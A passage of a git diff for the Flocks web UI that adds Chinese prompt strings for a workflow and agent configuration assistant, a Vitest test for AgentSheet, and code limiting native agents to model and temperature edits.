+        "guidePrompt": "用户点击了「帮我智能配置」按钮。这个按钮的意图是：请对当前工作流做一次完整配置盘点和引导，从 guide.md 里获取这个工作流有哪些可配置内容，包括但不限于发布配置、触发器/接入配置、工作流执行配置、输入输出配置、过滤/去重规则、样例验证和运行态/模板边界，并基于这些信息判断最应该先问用户的一个问题。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。配置模板接口是 GET/PUT {{configEndpoint}}，兜底模板迁移接口是 {{configSyncEndpoint}}。\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\n第一步必须读取 {{guidePath}}，并把 guide.md 作为这个工作流配置方式、问题顺序、默认选项和验证方式的唯一细节来源；可以调用 skill_load(name=\"{{configSkillName}}\") 作为交互协议，但不能用通用 skill 或 skill references 替代 guide.md。若 guide.md 不存在或内容不足，先停止并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md。需要我选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复中提问；一次只发一个问题卡片，默认推荐选项优先，并提供自定义/补充输入（没有则填 none）。发布/接入/触发模板必须先读后端配置，展示相对后端配置的 diff，确认后 PUT 完整配置到 {{configEndpoint}}；运行态动作必须使用前端当前 API 清单里的正确接口。config.json 和 workflow.json 中的 triggers 只能作为迁移兜底，不能直接写它们来表示配置已生效。后端接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库且未应用，不要追问用户要对 workflow.json 模板触发器做什么。",
+        "guideQuestionPrompt": "用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。配置模板接口是 GET/PUT {{configEndpoint}}，兜底模板迁移接口是 {{configSyncEndpoint}}。\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\n第一步必须读取 {{guidePath}}，不要要求 guide.md 存在按钮表；请把「{{focus}}」当作用户意图，自动从 guide.md 全文中提取相关的配置说明、默认值、限制、样例、验证方法和缺失信息，再基于这些引导用户。可以调用 skill_load(name=\"{{configSkillName}}\") 作为交互协议，但不能用通用 skill 或 skill references 替代 guide.md。若 guide.md 不存在或内容不足，先停止并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md。需要我选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复中提问；一次只发一个问题卡片，默认选项优先，并提供自定义/补充输入（没有则填 none）。发布/接入/触发模板必须先读后端配置，展示相对后端配置的 diff，确认后 PUT 完整配置到 {{configEndpoint}}；运行态动作必须使用前端当前 API 清单里的正确接口。config.json 和 workflow.json 中的 triggers 只能作为迁移兜底，不能直接写它们来表示配置已生效。后端接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库且未应用、未发布、未启动，不要追问用户要对 workflow.json 模板触发器做什么。",
+        "auditPrompt": "请先检查当前工作流配置和文档。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。第一步必须读取 guide.md，并以它作为配置细节来源；如果缺失，请明确指出。告诉我这个工作流已经配置好了什么、还缺什么，以及下一步最推荐我做什么。请不要修改文件。",
+        "samplePrompt": "我想用一条真实样例验证这个工作流。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，工作流配置引导文件是 {{guidePath}}，MD 文件是 {{dir}}workflow.md，JSON 文件是 {{dir}}workflow.json。第一步必须读取 guide.md，并以其中的样例验证章节作为验证方式来源。请告诉我应该粘贴什么格式的样例，并在我粘贴后检查字段映射、归一化结果和可能的处理结果。请不要修改文件。",
         "canHelp": "我可以帮你：",
         "bullet1": "修改节点逻辑或执行代码",
         "bullet2": "调整分支条件、数据流转",
         "bullet3": "新增或删除节点",
         "bullet4": "重构整体流程结构",
         "tipPart1": "修改前请先在左侧",
-        "tipPart2": "tab 查看当前流程描述，整体描述清楚后提交修改意图，效果更好。",
+        "tipPart2": "tab 查看当前 workflow.md，整体意图清楚后提交修改需求，效果更好。",
         "retry": "重试"
       }
     }
@@ -312,17 +455,56 @@
     },
     "rightPanel": {
       "tabOverview": "详情",
-      "tabChat": "对话"
+      "tabChat": "工作台",
+      "tabIntegration": "发布"
     },
     "overview": {
-      "chatHint": "在「对话」标签页中描述您的需求，工作流生成后详情将自动填充",
+      "chatHint": "在「工作台」标签页中描述您的需求，工作流生成后详情将自动填充",
       "execDescription": "执行流程描述"
     },
+    "publish": {
+      "emptyTitle": "等待生成工作流",
+      "emptyHint": "工作流生成后，可以在这里配置 API、Syslog、Kafka、Webhook 或定时触发等发布方式。"
+    },
     "chat": {
       "sessionTitle": "新建工作流",
       "preparing": "正在准备工作流助手...",
       "inputPlaceholder": "描述您想创建的工作流... (Enter 发送)",
       "contextMessage": "用户希望创建一个 Flocks 工作流，请使用 workflow-builder skill 来完成。",
+      "emptyStateTitle": "暂无执行记录",
+      "guidePanelTitle": "Rex 辅助创建",
+      "guidePanelDesc": "选择一个引导或创建案例，Rex 会按 workflow-builder skill 先确认场景、输入输出、节点流程和样例，再生成文件。",
+      "generateEditDocPrompt": "这是用户点击「生成说明」触发的新任务。按钮含义是：先按 workflow-builder skill 生成 workflow.md 说明文件，确认后再由「生成工作流」基于 workflow.md 生成 workflow.json。\n\n请按下面流程推进：\n1. 先加载并遵守 workflow-builder skill。\n2. 必须使用 question 工具询问我需要中文流程说明文档还是英文流程说明文档；一次只问一个问题，必须允许自定义输入。\n3. 如果左侧编辑器已有内容，把它作为已有草稿参考；如果为空，就先通过 question 工具收集创建工作流所需的业务场景、输入、输出、触发方式、节点流程、样例和验收标准。\n4. 参考 workflow-builder skill 中的 workflow_zh.md / workflow_en.md 模板结构，只生成一份 workflow.md。\n5. workflow.md 要面向人编辑：说明功能、适用场景、输入输出、节点流程、可修改点、样例和验收方式。\n6. 写入 workflow.md 前先展示 diff 并等待我确认；确认后再写入新工作流目录下的 workflow.md。\n7. 完成后提醒我可以点击「生成工作流」基于 workflow.md 生成 workflow.json。\n\n当前左侧编辑器内容：\n~~~markdown\n{{editDocContent}}\n~~~",
+      "generateWorkflowPrompt": "用户点击了「生成工作流」按钮。这个按钮的意思是：基于当前左侧编辑器里的 workflow.md 内容生成正式 Flocks 工作流，其中核心产物是 workflow.json。\n\n请按 workflow-builder skill 推进：\n1. 先读取并遵守 workflow-builder skill。\n2. 以下方 workflow.md 内容作为主要意图来源，不要把任务理解成重写 workflow.md。\n3. 若还没有工作流目录，请先根据 workflow.md 确认/生成合适的工作流 ID 和目录，再写入 workflow.md 与 workflow.json；若已有目录，则读取现有 workflow.json 并基于 workflow.md 更新机器定义。\n4. 生成的 workflow.json 必须是合法 JSON，节点和边必须组成完整流程图。\n5. 写 workflow.json 前必须展示 diff 并等待我确认。\n6. 完成后说明 workflow.json 改了什么，以及应该如何测试。\n\n当前编辑器中的 workflow.md 内容：\n~~~markdown\n{{editDocContent}}\n~~~",
+      "guideSectionTitle": "创建引导",
+      "caseSectionTitle": "创建案例",
+      "guideActions": [
+        {
+          "label": "如何创建工作流",
+          "description": "从零开始梳理业务目标、输入输出、节点流程、样例和生成步骤。",
+          "prompt": "请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。先不要写文件，先用 question 工具一次只问一个最关键问题，帮我明确业务场景、触发方式、输入输出、需要调用的工具/API、节点步骤、分支条件、样例数据和验收标准；等我确认后，必须先生成并写入 workflow.md，让我通过左侧编辑器或 diff 确认，再基于已确认的 workflow.md 生成完整 workflow.json 并进入测试流程。"
+        },
+        {
+          "label": "功能需求描述",
+          "description": "帮我把一句模糊需求整理成可生成 workflow.md 的结构化需求。",
+          "prompt": "请帮我把工作流功能需求描述清楚，目标是形成可用于生成 workflow.md 和 workflow.json 的结构化说明。请先用 question 工具一次只问一个问题，收集：这个工作流解决什么问题、输入是什么、输出是什么、使用者是谁、是否自动触发、需要哪些工具或服务、有哪些异常和边界情况、最终如何验证成功。"
+        },
+        {
+          "label": "设计节点流程",
+          "description": "把需求拆成节点、边、分支、循环和样例数据确认清单。",
+          "prompt": "请根据 workflow-builder skill 帮我设计工作流节点流程。请先确认我的业务目标和输入输出，然后输出思考维度、节点清单、边关系、分支/循环逻辑、异常处理和 Mermaid 流程简图；在我确认前不要写 workflow.json。"
+        },
+        {
+          "label": "编辑工作流节点",
+          "description": "用于已有草稿或生成后的工作流，调整节点职责、输入输出、代码或连接关系。",
+          "prompt": "请帮我编辑工作流节点。请先读取当前创建页左侧 workflow.md 草稿和已有 workflow.json（如果存在），然后用 question 工具确认我要修改哪个节点、修改目标、输入输出变化、是否影响上下游边关系和样例数据；修改前先给出计划和 diff，不要直接写文件。"
+        },
+        {
+          "label": "准备样例输入",
+          "description": "根据场景生成或校验一条样例输入，用于后续逐节点测试。",
+          "prompt": "请按 workflow-builder skill 帮我准备工作流样例输入。先确认工作流接收的数据格式和关键字段；如果我没有样例，请先构造一条最小可用 JSON 样例并用 question 工具让我确认；样例确认后再用于后续节点测试和集成测试。"
+        }
+      ],
       "welcomeMessage": "你好！我是工作流创建助手 🚀\n\n请描述您想要创建的工作流，例如：\n\n- **情报查询类**：IP / 域名 / 文件哈希 威胁情报查询\n- **数据处理类**：多源数据采集、清洗、关联分析\n- **自动化响应类**：安全告警处理、事件响应流程\n\n描述越详细，生成的工作流越准确。您也可以点击下方的示例问题快速开始！",
       "exampleQuestions": [
         "帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告",
@@ -330,6 +512,13 @@
         "设计一个文件哈希检测工作流，通过多个威胁情报平台对哈希值进行交叉验证",
         "建立一个钓鱼网站检测工作流，分析 URL 特征、页面内容和 SSL 证书信息",
         "创建一个安全事件响应工作流，自动收集、关联并分析安全告警，生成处置建议"
+      ],
+      "exampleQuestionLabels": [
+        "创建 IP 情报工作流",
+        "创建域名分析工作流",
+        "创建文件哈希工作流",
+        "创建钓鱼检测工作流",
+        "创建事件响应工作流"
       ]
     }
   },
diff --git a/webui/src/pages/Agent/AgentSheet.test.tsx b/webui/src/pages/Agent/AgentSheet.test.tsx
new file mode 100644
index 000000000..8c53b7e91
--- /dev/null
+++ b/webui/src/pages/Agent/AgentSheet.test.tsx
@@ -0,0 +1,287 @@
+import { render } from '@testing-library/react';
+import { describe, expect, it, vi, beforeEach } from 'vitest';
+
+import AgentSheet from './AgentSheet';
+import type { Agent } from '@/api/agent';
+
+const {
+  capturedEntitySheetProps,
+  mockUseRexComposerControls,
+  mockProviderList,
+  mockDefaultModelGetResolved,
+  mockModelListDefinitions,
+  mockToolList,
+  mockSkillList,
+} = vi.hoisted(() => ({
+  capturedEntitySheetProps: [] as any[],
+  mockUseRexComposerControls: vi.fn(),
+  mockProviderList: vi.fn(),
+  mockDefaultModelGetResolved: vi.fn(),
+  mockModelListDefinitions: vi.fn(),
+  mockToolList: vi.fn(),
+  mockSkillList: vi.fn(),
+}));
+
+vi.mock('@/components/common/EntitySheet', () => ({
+  default: (props: any) => {
+    capturedEntitySheetProps.push(props);
+    return <div data-testid="entity-sheet">{props.rexGuidePanelTitle}</div>;
+  },
+  useEntitySheet: () => ({
+    openRex: vi.fn(),
+    openTest: vi.fn(),
+  }),
+}));
+
+vi.mock('@/components/common/useRexComposerControls', () => ({
+  useRexComposerControls: mockUseRexComposerControls,
+}));
+
+vi.mock('@/api/provider', () => ({
+  providerAPI: { list: mockProviderList },
+  defaultModelAPI: { getResolved: mockDefaultModelGetResolved },
+  modelV2API: { listDefinitions: mockModelListDefinitions },
+}));
+
+vi.mock('@/api/tool', () => ({
+  toolAPI: { list: mockToolList },
+}));
+
+vi.mock('@/api/skill', () => ({
+  skillAPI: { list: mockSkillList },
+}));
+
+vi.mock('@/api/agent', () => ({
+  agentAPI: {
+    update: vi.fn(),
+    updateModel: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/session', () => ({
+  sessionApi: {
+    getMessages: vi.fn(),
+  },
+}));
+
+vi.mock('@/api/client', () => ({
+  default: {
+    post: vi.fn(),
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, unknown> = {
+        'create.guideSectionTitle': '创建引导',
+        'create.caseSectionTitle': '创建案例',
+        'create.guideActions': [
+          {
+            label: '如何创建子 Agent',
+            description: '创建说明',
+            prompt: '创建子 Agent',
+          },
+        ],
+        'create.caseActions': [],
+        'create.guidePanelTitle': 'Rex 辅助创建',
+        'create.guidePanelDesc': '创建描述',
+        'create.emptyStateTitle': '暂无创建对话',
+        'edit.guideSectionTitle': '编辑引导',
+        'edit.caseSectionTitle': '编辑案例',
+        'edit.guideActions': [
+          {
+            label: '优化当前 Agent',
+            description: '审视当前配置',
+            prompt: `编辑 ${String(params?.name ?? '')}`,
+          },
+          {
+            label: '验证效果',
+            description: '设计测试输入',
+            prompt: `验证 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.caseActions': [
+          {
+            label: '变得更保守',
+            description: '降低风险',
+            prompt: `保守 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.guidePanelTitle': 'Rex 辅助修改',
+        'edit.guidePanelDesc': '编辑描述',
+        'edit.nativeGuidePanelDesc': '内置编辑描述',
+        'edit.nativeGuideActions': [
+          {
+            label: '检查模型策略',
+            description: '检查模型',
+            prompt: `模型 ${String(params?.name ?? '')}`,
+          },
+          {
+            label: '调整温度',
+            description: '调整温度',
+            prompt: `温度 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.nativeCaseActions': [
+          {
+            label: '提升响应效率',
+            description: '提升效率',
+            prompt: `效率 ${String(params?.name ?? '')}`,
+          },
+        ],
+        'edit.emptyStateTitle': '暂无编辑对话',
+        'common:entity.defaultTestPrompt': '你好，请介绍一下你自己以及你的主要功能。',
+        'sheet.done': '完成',
+      };
+      const fallback = params?.defaultValue;
+      return translations[key] ?? (typeof fallback === 'string' ? fallback : key);
+    },
+  }),
+}));
+
+function makeAgent(overrides: Partial<Agent> = {}): Agent {
+  return {
+    name: 'audit-agent',
+    nameCn: '审计 Agent',
+    description: 'Reviews code changes',
+    descriptionCn: '审计代码变更',
+    mode: 'subagent',
+    native: false,
+    permission: [],
+    prompt: 'Review code safely.',
+    temperature: 0.3,
+    options: {},
+    tools: ['query_ioc'],
+    skills: ['agent-builder'],
+    ...overrides,
+  };
+}
+
+describe('AgentSheet', () => {
+  beforeEach(() => {
+    capturedEntitySheetProps.length = 0;
+    mockUseRexComposerControls.mockReturnValue({
+      rexAgentName: 'rex',
+      rexMentionAgents: [{ name: 'rex' }],
+      rexModel: { providerID: 'minimax', modelID: 'minimax-m3' },
+      rexSupportsVision: false,
+      rexContextWindowTokens: 8192,
+    });
+    mockProviderList.mockResolvedValue({ data: { connected: [], all: [] } });
+    mockDefaultModelGetResolved.mockResolvedValue({ data: {} });
+    mockModelListDefinitions.mockResolvedValue({ data: { models: [] } });
+    mockToolList.mockResolvedValue({ data: [] });
+    mockSkillList.mockResolvedValue({ data: [] });
+  });
+
+  it('uses an edit guide experience without a separate test tab when editing an agent', () => {
+    render(
+      <AgentSheet
+        agent={makeAgent()}
+        onClose={vi.fn()}
+        onSaved={vi.fn()}
+      />,
+    );
+
+    const props = capturedEntitySheetProps.at(-1);
+    expect(props.mode).toBe('edit');
+    expect(props.initialTab).toBe('rex');
+    expect(props.hideForm).toBe(false);
+    expect(props.rexSessionStorageKey).toBe('agent-edit:audit-agent');
+    expect(props.rexGuidePanelTitle).toBe('Rex 辅助修改');
+    expect(props.rexGuidePanelDesc).toBe('编辑描述');
+    expect(props.rexGuideEmptyTitle).toBe('暂无编辑对话');
+    expect(props.rexGuideGroups).toEqual([
+      {
+        title: '编辑引导',
+        actions: [
+          {
+            label: '优化当前 Agent',
+            description: '审视当前配置',
+            prompt: '编辑 audit-agent',
+            group: '编辑引导',
+          },
+          {
+            label: '验证效果',
+            description: '设计测试输入',
+            prompt: '验证 audit-agent',
+            group: '编辑引导',
+          },
+        ],
+      },
+      {
+        title: '编辑案例',
+        actions: [
+          {
+            label: '变得更保守',
+            description: '降低风险',
+            prompt: '保守 audit-agent',
+            group: '编辑案例',
+          },
+        ],
+      },
+    ]);
+    expect(props.rexAgentName).toBe('rex');
+    expect(props.onExtractFromRex).toEqual(expect.any(Function));
+    expect(props.onRunTest).toBeUndefined();
+    expect(props.defaultTestPrompt).toBeUndefined();
+    expect(props.rexSystemContext).toContain('Agent 编辑引导助手');
+    expect(props.rexSystemContext).toContain('Tools：query_ioc');
+    expect(props.rexSystemContext).toContain('Skills：agent-builder');
+  });
+
+  it('uses a model and temperature guide when editing a native agent', () => {
+    render(
+      <AgentSheet
+        agent={makeAgent({
+          name: 'device-inspector',
+          native: true,
+          model: { providerID: 'minimax', modelID: 'minimax-m3' },
+          tools: ['device_query'],
+          skills: ['agent-builder'],
+        })}
+        onClose={vi.fn()}
+        onSaved={vi.fn()}
+      />,
+    );
+
+    const props = capturedEntitySheetProps.at(-1);
+    expect(props.mode).toBe('edit');
+    expect(props.initialTab).toBe('rex');
+    expect(props.rexGuidePanelDesc).toBe('内置编辑描述');
+    expect(props.rexGuideGroups).toEqual([
+      {
+        title: '编辑引导',
+        actions: [
+          {
+            label: '检查模型策略',
+            description: '检查模型',
+            prompt: '模型 device-inspector',
+            group: '编辑引导',
+          },
+          {
+            label: '调整温度',
+            description: '调整温度',
+            prompt: '温度 device-inspector',
+            group: '编辑引导',
+          },
+        ],
+      },
+      {
+        title: '编辑案例',
+        actions: [
+          {
+            label: '提升响应效率',
+            description: '提升效率',
+            prompt: '效率 device-inspector',
+            group: '编辑案例',
+          },
+        ],
+      },
+    ]);
+    expect(props.rexSystemContext).toContain('只能保存模型和温度');
+    expect(props.rexSystemContext).toContain('不要建议提取或覆盖这些字段');
+    expect(props.rexWelcomeMessage).toContain('当前只支持保存模型和温度');
+  });
+});
diff --git a/webui/src/pages/Agent/AgentSheet.tsx b/webui/src/pages/Agent/AgentSheet.tsx
index e768f0768..14ce447a6 100644
--- a/webui/src/pages/Agent/AgentSheet.tsx
+++ b/webui/src/pages/Agent/AgentSheet.tsx
@@ -5,16 +5,18 @@
  * 合并为单一的 EntitySheet 封装，支持：
  * - 表单模式（直接填写字段：名称、描述、System Prompt、模型、温度、Tools、Skills）
  * - Rex 对话模式（自然语言描述 → 一键提取配置到表单）
- * - 测试模式（在编辑时直接向 Agent 发消息验证效果）
+ * - 工作台模式（通过引导卡片让 Rex 协助创建、编辑和验证配置）
  */
 
-import { useState, useEffect } from 'react';
+import { useState, useEffect, useMemo } from 'react';
 import { Bot, Sparkles, Lock } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { agentAPI, Agent } from '@/api/agent';
 import { sessionApi } from '@/api/session';
 import client from '@/api/client';
 import EntitySheet, { useEntitySheet } from '@/components/common/EntitySheet';
+import { buildGuidedCreateGroups } from '@/components/common/GuidedCreatePanel';
+import { useRexComposerControls } from '@/components/common/useRexComposerControls';
 import PillGroup from '@/components/common/PillGroup';
 import { providerAPI, defaultModelAPI, modelV2API } from '@/api/provider';
 import { toolAPI, Tool } from '@/api/tool';
@@ -55,8 +57,9 @@ interface AgentSheetProps {
 }
 
 export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps) {
-  const { t } = useTranslation('agent');
+  const { t } = useTranslation(['agent', 'common']);
   const isEdit = !!agent;
+  const isNative = !!agent?.native;
 
   const [formData, setFormData] = useState<AgentFormData>({
     name: agent?.name ?? '',
@@ -78,6 +81,34 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
   const [allSkills, setAllSkills] = useState<Skill[]>([]);
   const [toolsLoading, setToolsLoading] = useState(true);
   const [skillsLoading, setSkillsLoading] = useState(true);
+  const createGuideGroups = useMemo(() => buildGuidedCreateGroups([
+    { title: t('create.guideSectionTitle'), actions: t('create.guideActions', { returnObjects: true }) },
+    { title: t('create.caseSectionTitle'), actions: t('create.caseActions', { returnObjects: true }) },
+  ]), [t]);
+  const editGuideGroups = useMemo(() => {
+    const guideActionKey = isNative ? 'edit.nativeGuideActions' : 'edit.guideActions';
+    const caseActionKey = isNative ? 'edit.nativeCaseActions' : 'edit.caseActions';
+    const name = formData.name || agent?.name || 'Agent';
+
+    return buildGuidedCreateGroups([
+      {
+        title: t('edit.guideSectionTitle'),
+        actions: t(guideActionKey, {
+          returnObjects: true,
+          name,
+        }),
+      },
+      {
+        title: t('edit.caseSectionTitle'),
+        actions: t(caseActionKey, {
+          returnObjects: true,
+          name,
+        }),
+      },
+    ]);
+  }, [agent?.name, formData.name, isNative, t]);
+  const guideGroups = isEdit ? editGuideGroups : createGuideGroups;
+  const rexComposerControls = useRexComposerControls();
 
   // isPrimary derives from formData.mode so it reacts to mode changes in create mode
   const isPrimary = formData.mode === 'primary';
@@ -141,7 +172,6 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
     }
   }, [availableModels, formData.modelKey, modelsLoaded]);
 
-  const isNative = !!agent?.native;
   const submitDisabled = false;
 
   const handleSubmit = async () => {
@@ -184,25 +214,36 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
     }
   };
 
-  // ── Test: run agent with a prompt ─────────────────────────────────────────
-
-  const handleRunTest = async (prompt: string): Promise<string> => {
-    const res = await agentAPI.test(agent!.name, prompt);
-    return res.data.sessionId;
-  };
-
   // ── Rex: extract config from conversation ─────────────────────────────────
 
   const handleExtractFromRex = async (sessionId: string) => {
-    const extractPrompt = `请将以上讨论的 Agent 配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字：
+    const extractPrompt = isNative
+      ? `请将以上讨论的内置 Agent 可保存配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字。内置 Agent 只支持保存模型和温度，不要输出 description、prompt、tools、skills 等不可保存字段：
+\`\`\`json
+{
+  "model": {
+    "providerID": "模型 Provider ID（可选）",
+    "modelID": "模型 ID（可选）"
+  },
+  "temperature": 0.7
+}
+\`\`\``
+      : `请将以上讨论的 Agent 配置整理输出为 JSON，只输出 JSON 对象，不要有任何其他文字：
 \`\`\`json
 {
   "name": "agent-名称（小写字母、数字和连字符）",
+  "name_cn": "中文名称（可选）",
   "description": "简短英文描述（用于委派）",
   "description_cn": "中文界面展示（可选）",
   "prompt": "完整的 System Prompt 内容",
+  "model": {
+    "providerID": "模型 Provider ID（可选）",
+    "modelID": "模型 ID（可选）"
+  },
   "temperature": 0.7,
-  "mode": "primary 或 subagent"
+  "mode": "primary 或 subagent",
+  "tools": ["工具名称（可选）"],
+  "skills": ["Skill 名称（可选）"]
 }
 \`\`\``;
 
@@ -230,30 +271,49 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
 
           const config = parseJsonFromText(text);
           if (config) {
-            setFormData((prev) => ({
-              ...prev,  // preserve tools, skills, modelKey
-              name: config.name || prev.name,
-              nameCn:
-                (typeof config.name_cn === 'string'
-                  ? config.name_cn
-                  : typeof config.nameCn === 'string'
-                    ? config.nameCn
-                    : prev.nameCn),
-              description: config.description ?? prev.description,
-              descriptionCn:
-                (typeof config.description_cn === 'string'
-                  ? config.description_cn
-                  : typeof config.descriptionCn === 'string'
-                    ? config.descriptionCn
-                    : prev.descriptionCn),
-              prompt: config.prompt || prev.prompt,
-              temperature:
-                typeof config.temperature === 'number' ? config.temperature : prev.temperature,
-              mode:
-                config.mode === 'primary' || config.mode === 'subagent'
-                  ? config.mode
-                  : prev.mode,
-            }));
+            setFormData((prev) => {
+              const modelKey = getModelKeyFromConfig(config, prev.modelKey);
+              const temperature = typeof config.temperature === 'number' ? config.temperature : prev.temperature;
+
+              if (isNative) {
+                return {
+                  ...prev,
+                  modelKey,
+                  temperature,
+                };
+              }
+
+              return {
+                ...prev,
+                name: config.name || prev.name,
+                nameCn:
+                  (typeof config.name_cn === 'string'
+                    ? config.name_cn
+                    : typeof config.nameCn === 'string'
+                      ? config.nameCn
+                      : prev.nameCn),
+                description: config.description ?? prev.description,
+                descriptionCn:
+                  (typeof config.description_cn === 'string'
+                    ? config.description_cn
+                    : typeof config.descriptionCn === 'string'
+                      ? config.descriptionCn
+                      : prev.descriptionCn),
+                prompt: config.prompt || prev.prompt,
+                modelKey,
+                temperature,
+                mode:
+                  config.mode === 'primary' || config.mode === 'subagent'
+                    ? config.mode
+                    : prev.mode,
+                tools: Array.isArray(config.tools)
+                  ? config.tools.filter((tool: unknown): tool is string => typeof tool === 'string')
+                  : prev.tools,
+                skills: Array.isArray(config.skills)
+                  ? config.skills.filter((skill: unknown): skill is string => typeof skill === 'string')
+                  : prev.skills,
+              };
+            });
             return;
           }
         }
@@ -270,8 +330,18 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
       entityType="Agent"
       entityName={agent?.name}
       icon={<Bot className="w-5 h-5" />}
-      rexSystemContext={buildRexContext(formData, isEdit)}
-      rexWelcomeMessage={buildRexWelcome(isEdit, agent?.name)}
+      rexSystemContext={buildRexContext(formData, isEdit, isNative)}
+      rexWelcomeMessage={buildRexWelcome(isEdit, agent?.name, isNative)}
+      rexGuideGroups={guideGroups}
+      rexGuidePanelTitle={isEdit ? t('edit.guidePanelTitle') : t('create.guidePanelTitle')}
+      rexGuidePanelDesc={isEdit
+        ? t(isNative ? 'edit.nativeGuidePanelDesc' : 'edit.guidePanelDesc', { name: agent?.name ?? formData.name })
+        : t('create.guidePanelDesc')}
+      rexGuideEmptyTitle={isEdit ? t('edit.emptyStateTitle') : t('create.emptyStateTitle')}
+      rexGuideIcon={<Bot className="h-5 w-5" />}
+      initialTab={isEdit ? 'rex' : undefined}
+      rexSessionStorageKey={isEdit && agent?.name ? `agent-edit:${agent.name}` : undefined}
+      {...rexComposerControls}
       submitDisabled={submitDisabled}
       submitLoading={loading}
       submitLabel={isEdit ? undefined : t('sheet.done')}
@@ -279,8 +349,6 @@ export default function AgentSheet({ agent, onClose, onSaved }: AgentSheetProps)
       onClose={onClose}
       onSubmit={handleSubmit}
       onExtractFromRex={isEdit ? handleExtractFromRex : undefined}
-      onRunTest={isEdit ? handleRunTest : undefined}
-      defaultTestPrompt="你好，请介绍一下你自己以及你的主要功能。"
     >
       <AgentFormContent
         formData={formData}
@@ -697,22 +765,24 @@ function AgentFormContent({
 
 // ─── Rex context builders ─────────────────────────────────────────────────────
 
-function buildRexContext(formData: AgentFormData, isEdit: boolean): string {
+function buildRexContext(formData: AgentFormData, isEdit: boolean, isNative = false): string {
   if (!isEdit) {
     return `你是 Agent 创建助手。用户希望通过对话来创建一个新的子 Agent。
 
-请使用 agent-builder skill 根据用户的需求生成子 Agent 配置文件（YAML + prompt 文件），保存到 ~/.flocks/plugins/agents/ 目录。
+请先加载并遵守项目内 .flocks/plugins/skills/agent-builder（agent-builder skill），再根据用户需求生成子 Agent 配置文件（agent.yaml + prompt.md），保存到 ~/.flocks/plugins/agents/<name>/ 目录。
 
 **创建流程：**
 1. 先确认用户需求：Agent 名称、职责、能力边界、执行模式
-2. 生成 prompt 文件（.prompt.md）和配置文件（.yaml）
-3. 验证文件正确性
+2. 生成 prompt.md 和 agent.yaml，目录名必须与 Agent name 一致
+3. 验证 YAML、目录结构、名称唯一性和工具名
 
 **重要约束：**
+- 必须先加载 .flocks/plugins/skills/agent-builder
 - Agent 名称必须是 kebab-case 格式
 - 如果用户提供中文名称，请写入 name_cn 字段
 - mode 固定为 subagent
-- 文件必须写入 ~/.flocks/plugins/agents/
+- 文件必须写入 ~/.flocks/plugins/agents/<name>/，禁止创建 agents/<name>.yaml 这类扁平文件
+- 新 Agent 优先使用 tools: allowlist，不要随意使用 permission 通配规则
 - 不要与内置 Agent 名称冲突
 
 请先引导用户描述需求，如果信息不够清晰可适当追问，然后一次性生成所有文件。`;
@@ -722,41 +792,81 @@ function buildRexContext(formData: AgentFormData, isEdit: boolean): string {
     formData.prompt.length > 200
       ? formData.prompt.slice(0, 200) + '...'
       : formData.prompt;
+  const toolsSummary = formData.tools.length > 0 ? formData.tools.join(', ') : '（未配置）';
+  const skillsSummary = formData.skills.length > 0 ? formData.skills.join(', ') : '（未配置）';
+  const modelSummary = formData.modelKey || '（系统默认）';
+  const editableFieldLines = isNative
+    ? [
+        `**可保存字段说明：**`,
+        `- **模型**：可建议切换到更适合当前职责的模型，但需要给出 Provider ID 和 Model ID 才能自动提取。`,
+        `- **温度**：0-2，值越低越精准保守（安全分析推荐 0.2-0.5），越高越有创意。`,
+        `- **验证建议**：可以设计测试输入、预期输出和失败判据，帮助用户保存后验证效果。`,
+        `- 内置 Agent 的描述、System Prompt、Tools、Skills 由系统维护，不要建议提取或覆盖这些字段。`,
+      ]
+    : [
+        `**可编辑字段说明：**`,
+        `- **描述**：简短说明 Agent 的用途，英文描述用于委派和模型上下文。`,
+        `- **System Prompt**：Agent 的核心指令，决定其行为、能力边界、输出格式和风格。`,
+        `- **模型 / 温度**：模型决定能力边界；温度 0-2，值越低越精准保守，越高越有创意。`,
+        `- **Tools / Skills**：只保留任务确实需要的能力，优先使用最小权限。`,
+        `- **模式**：仅展示当前类型；编辑时不要建议修改 primary/subagent 模式。`,
+      ];
 
   return [
-    `你是一个 Agent 配置专家，正在帮助用户修改一个 AI Agent。`,
+    `你是一个 Agent 编辑引导助手，正在帮助用户修改一个已有 AI Agent。`,
+    `你的目标不是直接大改配置，而是先理解当前配置、追问修改意图，再给出可应用到表单的修改方案。`,
+    isNative
+      ? `这是内置 Agent：只能保存模型和温度。若用户要求修改职责、Prompt、Tools 或 Skills，请明确说明这些字段当前不可保存，只能给出验证建议或外部配置建议。`
